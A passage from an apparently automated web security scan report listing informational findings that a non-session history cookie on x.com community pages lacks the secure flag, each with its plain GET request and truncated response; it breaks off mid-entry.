Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.67. https://www.x.com/community/ppx/xspaces/digital_goods  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.68. https://www.x.com/community/ppx/xspaces/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.69. https://www.x.com/community/ppx/xspaces/forums  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.70. https://www.x.com/community/ppx/xspaces/gaming  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.71. https://www.x.com/community/ppx/xspaces/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.72. https://www.x.com/community/ppx/xspaces/innovate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.73. https://www.x.com/community/ppx/xspaces/introduce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.74. https://www.x.com/community/ppx/xspaces/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.75. https://www.x.com/community/ppx/xspaces/mobile/mecl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.77. https://www.x.com/community/ppx/xspaces/security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.78. https://www.x.com/community/ppx/xspaces/social  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.79. https://www.x.com/community/ppx/xspaces/subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.80. https://www.x.com/community/ppx/xspaces/toolkits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.81. https://www.x.com/community/ppx/xspaces/web_checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.84. https://www.x.com/community/xcommerce-blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

